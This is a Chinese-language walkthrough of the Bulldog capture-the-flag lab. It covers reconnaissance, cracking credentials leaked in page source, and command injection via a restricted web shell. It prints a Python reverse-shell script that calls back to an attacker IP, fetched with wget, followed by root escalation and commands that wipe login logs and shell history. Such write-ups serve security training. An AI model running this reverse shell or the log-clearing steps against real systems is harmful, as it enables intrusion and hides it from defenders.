攻击机:Kali
攻击机ip:192.168.56.102
主机发现
端口扫描
版本侦测
访问80,8080端口是一样的网站
在http://192.168.56.101:8080界面没有发现有价值的信息
进行目录爆破
访问http://192.168.56.101:8080/admin/
发现用户登录界面
访问http://192.168.56.101:8080/dev/
新的网站将完全用Django语言编写(丘奇先生要求的是“高端科技潮人的东西”)。从现在起,系统上已启用SSH。当我们转换到使用WebShell(一个专有的Shell接口)时,这将被关闭。此工具在下面的链接中进行了说明。另外,请注意,我们将开始使用MongoDB,但是我们还没有完全安装它。
另外,请注意,我们将实施一个革命性的视听系统,这是为我们定制的供应商。它标榜能够每分钟运行一次来检测入侵和黑客攻击。一旦启动并运行,我们将在系统上安装它。
访问UNDER DEVELOPMENT,回到当前界面
访问Web-Shell
推测可能需要在之前那个验证界面登录成功,才能使用这个页面的功能
在http://192.168.56.101:8080/dev/的源代码中发现可疑信息
对这些信息进行解密https://www.somd5.com
破解得到两组账户密码
nick bulldog
sarah bulldoglover
登录成功,但是在登录成功界面没有什么可以获取的信息
切换到之前那个需要身份验证的界面
这个界面只能运行给定的五条命令,应该判断是否有命令执行漏洞
确实执行了pwd,因为这个网站是没有php的,可以尝试执行python一句话反弹shell,执行后发现;被屏蔽了,还是上传python脚本反弹shell
搭建apache服务器
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.37.131”,1234)) #这里是你的kali的ip以及端口
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
ls & wget http://192.168.56.102:8080/shell.py
在kali监听1234端口
执行python脚本
ls & python /home/django/bulldog/shell.py
成功的反弹shell
之后的一般思路是查看操作系统版本以及内核版本,然后提权
但是靶机中没有gcc
当前账户可以使用sudo命令,只要知道当前账户的密码就可以提权到root
切换到/home目录,发现bulldogadmin
在此目录中发现隐藏admin目录
里边有个笔记
cat customPermissionApp
strings customPermissionApp
string 工具可以对任何文件的内容进行分析,并输出可打印字符长度不小于4的串。
密码应该就是这一串东西:SUPERultimatePASSWORDyouCANTget
上传后门以及清除痕迹
last -f /var/log/btmp
查看错误登陆日志,该日志记录有人使用暴力破解登录ssh服务,该日志是二进制文件,不能用cat,tail查看,可以用last/lastb查看
cat /var/log/auth.log 查看身份认证服务
#echo > /var/log/wtmp
#echo > /var/log/btmp
#echo > /var/log/lastlog
history -c 删除所有的日志记录
部分删除操作:
1.vim ~/.bash_history
该文件即为历史记录存储文件,我们随意修改
2.修改后再次 history 查看,发现并没有变化。原因:缓存
执行:history -r
读取历史文件并将其内容添加到历史记录中,即重置文件里的内容到内存中,完成修改!
